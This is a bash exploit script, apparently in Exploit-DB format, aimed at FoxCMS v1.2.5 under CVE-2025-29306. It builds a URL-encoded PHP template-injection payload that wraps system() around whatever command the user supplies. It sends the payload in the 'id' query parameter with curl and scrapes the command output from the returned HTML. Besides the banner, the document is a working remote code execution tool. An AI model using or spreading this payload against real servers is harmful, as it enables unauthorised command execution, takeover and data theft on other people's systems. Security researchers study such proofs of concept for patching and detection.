# Date: 2025-04-17
# Exploit Title:
# Exploit Author: VeryLazyTech
# Vendor Homepage: https://www.foxcms.org/
# Software Link: https://www.foxcms.cn/
# Version: FoxCMS v.1.2.5
# Tested on: Ubuntu 22.04, Windows Server 2019
# CVE: CVE-2025-29306
# Website: https://www.verylazytech.com
#!/bin/bash
banner() {
cat <<'EOF'
______ _______ ____ ___ ____ ____ ____ ___ _____ ___ __
/ ___\ \ / / ____| |___ \ / _ \___ \| ___| |___ \ / _ \___ / / _ \ / /_
| | \ \ / /| _| __) | | | |__) |___ \ __) | (_) ||_ \| | | | '_ \
| |___ \ V / | |___ / __/| |_| / __/ ___) | / __/ \__, |__) | |_| | (_) |
\____| \_/ |_____| |_____|\___/_____|____/ |_____| /_/____/ \___/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
@VeryLazyTech - Medium
EOF
}
# Call the banner function
banner
set -e
# Check for correct number of arguments
if [ "$#" -ne 2 ]; then
printf "Usage: $0 <url> <command>"
exit 1
fi
TARGET=$1
# Encode payload
ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
FULL_URL="${TARGET}?id=${ENCODED_CMD}"
echo "[*] Sending RCE payload: $2"
HTML=$(curl -s "$FULL_URL")
# Extract <ul> from known XPath location using xmllint
UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)
# Strip tags, clean up
CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//')
echo
echo "[+] Command Output:"
echo "$CLEANED"